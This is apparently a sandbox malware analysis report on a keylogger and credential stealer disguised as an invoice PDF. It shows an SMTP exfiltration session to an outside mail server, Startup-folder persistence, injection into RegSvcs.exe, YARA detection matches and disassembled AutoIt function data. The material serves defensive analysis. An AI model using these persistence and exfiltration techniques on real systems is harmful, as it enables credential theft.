Jan 15, 2025 15:02:37.974771023 CET	49925	587	192.168.2.10	208.91.199.223	RCPT TO:<director@igakuin.com>
Jan 15, 2025 15:02:38.146995068 CET	587	49925	208.91.199.223	192.168.2.10	250 2.1.5 Ok
Jan 15, 2025 15:02:38.147301912 CET	49925	587	192.168.2.10	208.91.199.223	DATA
Jan 15, 2025 15:02:38.294559956 CET	587	49925	208.91.199.223	192.168.2.10	354 End data with <CR><LF>.<CR><LF>
Jan 15, 2025 15:02:38.295492887 CET	49925	587	192.168.2.10	208.91.199.223	.
Jan 15, 2025 15:02:38.648910046 CET	587	49925	208.91.199.223	192.168.2.10	250 2.0.0 Ok: queued as 1299D500384

Target ID:	0
Start time:	09:01:57
Start date:	15/01/2025
Path:	C:\Users\user\Desktop\Invoice No 1122207 pdf.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Invoice No 1122207 pdf.exe"
Imagebase:	0x410000
File size:	1'586'176 bytes
MD5 hash:	F4D3B326B29B4D0D8269499BE0BC6B7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	09:01:58
Start date:	15/01/2025
Path:	C:\Users\user\AppData\Local\supergroup\ageless.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Invoice No 1122207 pdf.exe"
Imagebase:	0xaf0000
File size:	1'586'176 bytes
MD5 hash:	F4D3B326B29B4D0D8269499BE0BC6B7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.1287788787.0000000001580000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000007.00000002.1287788787.0000000001580000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000007.00000002.1287788787.0000000001580000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000002.1287788787.0000000001580000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000007.00000002.1287788787.0000000001580000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000007.00000002.1287788787.0000000001580000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000007.00000002.1287788787.0000000001580000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 45%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	09:01:59
Start date:	15/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Invoice No 1122207 pdf.exe"
Imagebase:	0xbf0000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000008.00000002.2527756944.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2524453250.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000008.00000002.2524453250.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000008.00000002.2524453250.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000008.00000002.2524453250.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2527756944.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	09:02:10
Start date:	15/01/2025
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ageless.vbs"
Imagebase:	0x7ff688d00000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	09:02:10
Start date:	15/01/2025
Path:	C:\Users\user\AppData\Local\supergroup\ageless.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\supergroup\ageless.exe"
Imagebase:	0xaf0000
File size:	1'586'176 bytes
MD5 hash:	F4D3B326B29B4D0D8269499BE0BC6B7F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.1413396294.0000000001600000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000000A.00000002.1413396294.0000000001600000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000A.00000002.1413396294.0000000001600000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000A.00000002.1413396294.0000000001600000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000A.00000002.1413396294.0000000001600000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 0000000A.00000002.1413396294.0000000001600000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 0000000A.00000002.1413396294.0000000001600000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	09:02:11
Start date:	15/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\supergroup\ageless.exe"
Imagebase:	0x1a0000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000B.00000002.2526741820.0000000002481000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	2.5%
Dynamic/Decrypted Code Coverage:	1.1%
Signature Coverage:	3.2%
Total number of Nodes:	1671
Total number of Limit Nodes:	37

Executed Functions

Function 004142DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 0041430D

Part of subcall function 00416B57: _wcslen.LIBCMT ref: 00416B6A

GetCurrentProcess.KERNEL32(?,004ACB64,00000000,?,?), ref: 00414422
IsWow64Process.KERNEL32(00000000,?,?), ref: 00414429
LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00414454
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00414466
GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00414474
FreeLibrary.KERNEL32(00000000,?,?), ref: 0041447B
GetSystemInfo.KERNEL32(?,?,?), ref: 004144A0

Strings

|O, xrefs: 004536F8
kernel32.dll, xrefs: 0041444F
GetNativeSystemInfo, xrefs: 00414460

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
String ID: GetNativeSystemInfo$kernel32.dll$|O
API String ID: 3290436268-3101561225
Opcode ID: aaf28ca9ac9dff68355ec1cf01acc6150346ab212075de34b17506de4523a9e2
Instruction ID: 5bd0a10c115b8233cb2554a713b1d08cb2f7d6e949969e7e1139dd94e7fea33c
Opcode Fuzzy Hash: aaf28ca9ac9dff68355ec1cf01acc6150346ab212075de34b17506de4523a9e2
Instruction Fuzzy Hash: 6AA1C27198A2D0CFE711CB6978C05D97FA46B66741B0848FADC819BB33D2384959CB3E

Function 004142A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,004150AA,?,?,00000000,00000000), ref: 004142B2
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,004150AA,?,?,00000000,00000000), ref: 004142C9
LoadResource.KERNEL32(?,00000000,?,?,004150AA,?,?,00000000,00000000,?,?,?,?,?,?,00414F20), ref: 004535BE
SizeofResource.KERNEL32(?,00000000,?,?,004150AA,?,?,00000000,00000000,?,?,?,?,?,?,00414F20), ref: 004535D3
LockResource.KERNEL32(004150AA,?,?,004150AA,?,?,00000000,00000000,?,?,?,?,?,?,00414F20,?), ref: 004535E6

Strings

SCRIPT, xrefs: 004142BF

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 746cf777421605f4214d5d84872288f6da5fa601163c1849baf0c5c19e0d5c78
Instruction ID: 64b352aa6eec582408cddc42f2d7f946e43335457cb45514df6342ae0d7497fa
Opcode Fuzzy Hash: 746cf777421605f4214d5d84872288f6da5fa601163c1849baf0c5c19e0d5c78
Instruction Fuzzy Hash: 4E118E71600700BFD7218B65DC88FA77BBAEBC6B91F2041AEF402D6290DB71DC408675

Function 00452BA5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetCurrentDirectoryW.KERNEL32(?), ref: 00412B6B

Part of subcall function 00413A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,x,?,00412E7F,?,?,?,00000000), ref: 00413A78

Part of subcall function 00419CB3: _wcslen.LIBCMT ref: 00419CBD

GetForegroundWindow.USER32(runas,?,?,?,?,?,004D2224), ref: 00452C10
ShellExecuteW.SHELL32(00000000,?,?,004D2224), ref: 00452C17

Strings

x, xrefs: 00452BD9
runas, xrefs: 00452C0B

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
String ID: runas$x
API String ID: 448630720-3498699815
Opcode ID: 7ffc949f8284cc3ea7ca7fc51ac5a5bb39760a00da868b68a8ce1db42f48e4a5
Instruction ID: ad4ded320dad4d48f974248dad2d2636c224a195f8523edf24c567d04a517595
Opcode Fuzzy Hash: 7ffc949f8284cc3ea7ca7fc51ac5a5bb39760a00da868b68a8ce1db42f48e4a5
Instruction Fuzzy Hash: B411D2312483456AC704FF21D9A19FE7BA4AB9175AF04142FF582421A3CF7C9A9AC71E

Function 0041D730 Relevance: 21.6, APIs: 14, Instructions: 627windowsleeptimeCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 0041D807
timeGetTime.WINMM ref: 0041DA07
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041DB28
TranslateMessage.USER32(?), ref: 0041DB7B
DispatchMessageW.USER32(?), ref: 0041DB89
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041DB9F
Sleep.KERNEL32(0000000A), ref: 0041DBB1

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
String ID:
API String ID: 2189390790-0
Opcode ID: 783e09a42ab99b587569e984080fde5c62fe3790636638ddbc6778f1d992b362
Instruction ID: 233eb11a11d6ee92a0007f630f6eca49b9dfb503b303113e6136d5293f7cdb47
Opcode Fuzzy Hash: 783e09a42ab99b587569e984080fde5c62fe3790636638ddbc6778f1d992b362
Instruction Fuzzy Hash: 9C42E6B0A08641EFD724CF25C984BAAB7E4BF45304F14452FE4568B391D7B8E885CB8B

Function 0041344D Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00413A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,x,?,00412E7F,?,?,?,00000000), ref: 00413A78

Part of subcall function 00413357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00413379

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0041356A
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0045318D
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 004531CE
RegCloseKey.ADVAPI32(?), ref: 00453210
_wcslen.LIBCMT ref: 00453277
_wcslen.LIBCMT ref: 00453286

Strings

H], xrefs: 0041349D
DB, xrefs: 004134E2
\, xrefs: 0045328C
\Include\, xrefs: 00413527
Include, xrefs: 00453184, 004531C5
Software\AutoIt v3\AutoIt, xrefs: 00413560

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
String ID: DB$H]$Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 98802146-1816929873
Opcode ID: 8608aa9faca4614c8295662195032f77df9c0dbd5ffafe395ef97d8df9d46350
Instruction ID: e858ca5e4124b1a09b43b7b6f1e66bc920bdadb0341b8ba7d42d13a84b332d22
Opcode Fuzzy Hash: 8608aa9faca4614c8295662195032f77df9c0dbd5ffafe395ef97d8df9d46350
Instruction Fuzzy Hash: 66717F714043409EC314DF66DD8299BBBE8BF95744F40443FF94587262EBB89A88CF69

Function 00412CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00412D07
RegisterClassExW.USER32(00000030), ref: 00412D31
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00412D42
InitCommonControlsEx.COMCTL32(?), ref: 00412D5F
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00412D6F
LoadIconW.USER32(000000A9), ref: 00412D85
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00412D94

Strings

+, xrefs: 00412CF0
AutoIt v3 GUI, xrefs: 00412D23
TaskbarCreated, xrefs: 00412D37
0, xrefs: 00412CE9

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 32c5a8e4bb33209f5f27b13525c99b181c67f46ff3983be29a8df546a1a241be
Instruction ID: 26d889eeab7737b67dd740a4315651944a1799193d87aa314ad0eb52171a6d8d
Opcode Fuzzy Hash: 32c5a8e4bb33209f5f27b13525c99b181c67f46ff3983be29a8df546a1a241be
Instruction Fuzzy Hash: 8621E3B5D41259AFDB40DFA4E889BDDBFB4FB09700F00812AF911AA2A1D7B50540CF98

Function 0045065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0045039A: CreateFileW.KERNELBASE(00000000,00000000,?,00450704,?,?,00000000,?,00450704,00000000,0000000C), ref: 004503B7

GetLastError.KERNEL32 ref: 0045076F
__dosmaperr.LIBCMT ref: 00450776
GetFileType.KERNELBASE(00000000), ref: 00450782
GetLastError.KERNEL32 ref: 0045078C
__dosmaperr.LIBCMT ref: 00450795
CloseHandle.KERNEL32(00000000), ref: 004507B5
CloseHandle.KERNEL32(?), ref: 004508FF
GetLastError.KERNEL32 ref: 00450931
__dosmaperr.LIBCMT ref: 00450938

Strings

H, xrefs: 004508BD

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 62422ab422a217111100034ea33636ba52f09ab7fcb2cecb204abd2e280dd0aa
Instruction ID: 8e904d2056069bcdf7042deb4b8b28dc10fc79de7f2d6027b8a517a76bdb949f
Opcode Fuzzy Hash: 62422ab422a217111100034ea33636ba52f09ab7fcb2cecb204abd2e280dd0aa
Instruction Fuzzy Hash: 8AA138369001448FDF19AF68D891BAE7BA0AB0A325F14015EFC119F3D2DB799C17CB99

Function 00412B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00412B8E
LoadCursorW.USER32(00000000,00007F00), ref: 00412B9D
LoadIconW.USER32(00000063), ref: 00412BB3
LoadIconW.USER32(000000A4), ref: 00412BC5
LoadIconW.USER32(000000A2), ref: 00412BD7
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00412BEF
RegisterClassExW.USER32(?), ref: 00412C40

Part of subcall function 00412CD4: GetSysColorBrush.USER32(0000000F), ref: 00412D07
Part of subcall function 00412CD4: RegisterClassExW.USER32(00000030), ref: 00412D31
Part of subcall function 00412CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00412D42
Part of subcall function 00412CD4: InitCommonControlsEx.COMCTL32(?), ref: 00412D5F
Part of subcall function 00412CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00412D6F
Part of subcall function 00412CD4: LoadIconW.USER32(000000A9), ref: 00412D85
Part of subcall function 00412CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00412D94

Strings

0, xrefs: 00412C0F
#, xrefs: 00412C16
AutoIt v3, xrefs: 00412C2F

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 5f3defe11aa67fa14354c54093b3ed26a43743fd2890b839e2a8da65b06e3452
Instruction ID: 3b2bc01a16742ff9486beedea7918da6c5c0350a629f755a44a63e5c1f45029d
Opcode Fuzzy Hash: 5f3defe11aa67fa14354c54093b3ed26a43743fd2890b839e2a8da65b06e3452
Instruction Fuzzy Hash: 7D210974E40358ABEB109FA5ECD5AAD7FB4FB48B50F00403AE901AA6B1D7B51540DF98

Function 0041B710 Relevance: 16.3, APIs: 1, Strings: 8, Instructions: 587COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0041BB4E

Strings

p#N, xrefs: 0046024F
p#N, xrefs: 0041BB6B
p#N, xrefs: 0041BA72
x#N, xrefs: 00460168
p%N, xrefs: 0041BB32
x#N, xrefs: 00460207
p#N, xrefs: 00460263
p%N, xrefs: 0041B8DC

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Init_thread_footer
String ID: p#N$p#N$p#N$p#N$p%N$p%N$x#N$x#N
API String ID: 1385522511-494311825
Opcode ID: 40e50a3d7410e6b068517d3d6e1c41549f29d544faf58bec2ed27f951291ceea
Instruction ID: 506366aa057c60245765c5e74e2f2a7793ee1dc189930ce2cd01e309ae8887d5
Opcode Fuzzy Hash: 40e50a3d7410e6b068517d3d6e1c41549f29d544faf58bec2ed27f951291ceea
Instruction Fuzzy Hash: 5532AB70A002099FCB14CF55C994ABBB7B9EF44344F14805BED15AB391D7BCAD82CB9A

Function 00413170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,0041316A,?,?), ref: 004131D8
KillTimer.USER32(?,00000001,?,?,?,?,?,0041316A,?,?), ref: 00413204
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00413227
RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,0041316A,?,?), ref: 00413232
CreatePopupMenu.USER32 ref: 00413246
PostQuitMessage.USER32(00000000), ref: 00413267

Strings

TaskbarCreated, xrefs: 0041322D

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: 5109e91ba2ac79aefeca65be9e1acab6ed644203a5e74d02306d3dff3c842511
Instruction ID: 6c59f49d2d4b00ad51ea740e1028840623781f8c34ef55a238766ca6cf6b1d49
Opcode Fuzzy Hash: 5109e91ba2ac79aefeca65be9e1acab6ed644203a5e74d02306d3dff3c842511
Instruction Fuzzy Hash: 1F411935380144B6DB146F689D8D7FE3A59E706346F04413BF901892B2CBBD9EC1876E

Function 0041DFD0 Relevance: 15.4, APIs: 2, Strings: 6, Instructions: 1414COMMON

Download Yara Rule

Strings

D%N, xrefs: 0041E4B1
Variable must be of type 'Object'., xrefs: 004632B7
D%N, xrefs: 00462FDA
D%N, xrefs: 0041E1E0
D%N, xrefs: 0046302D
D%ND%N, xrefs: 0041E27E

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
